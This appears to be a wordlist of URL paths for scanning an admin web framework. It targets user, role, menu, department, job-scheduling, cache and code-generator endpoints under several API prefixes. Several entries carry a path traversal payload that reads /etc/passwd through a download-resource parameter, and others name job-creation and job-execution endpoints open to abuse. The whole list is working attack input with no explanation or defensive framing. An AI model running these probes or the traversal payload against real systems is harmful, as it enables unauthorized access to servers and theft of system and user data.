/system/user/list
/system/user/profile
/system/role/list
/system/menu/list
/system/dept/list
/system/role/export
/common/download/resource?resource=/profile/../../../../etc/passwd
/api/system/user/list
/api/system/user/profile
/api/system/role/list
/api/system/menu/list
/api/system/dept/list
/api/system/role/export
/api/common/download/resource?resource=/profile/../../../../etc/passwd
/prod-api/system/user/list
/prod-api/system/user/profile
/prod-api/system/role/list
/prod-api/system/menu/list
/prod-api/system/dept/list
/prod-api/system/role/export
/prod-api/common/download/resource?resource=/profile/../../../../etc/passwd
/admin-api/system/user/list
/admin-api/system/user/profile
/admin-api/system/role/list
/admin-api/system/menu/list
/admin-api/system/dept/list
/admin-api/system/role/export
/admin-api/common/download/resource?resource=/profile/../../../../etc/passwd
/dev-api/system/user/list
/dev-api/system/user/profile
/dev-api/system/role/list
/dev-api/system/menu/list
/dev-api/system/dept/list
/dev-api/system/role/export
/dev-api/common/download/resource?resource=/profile/../../../../etc/passwd
/monitor/job/add
/monitor/job/run
/tool/gen/createTable
/monitor/cache/getNames
/monitor/cache/getKeys
/monitor/cache/getValue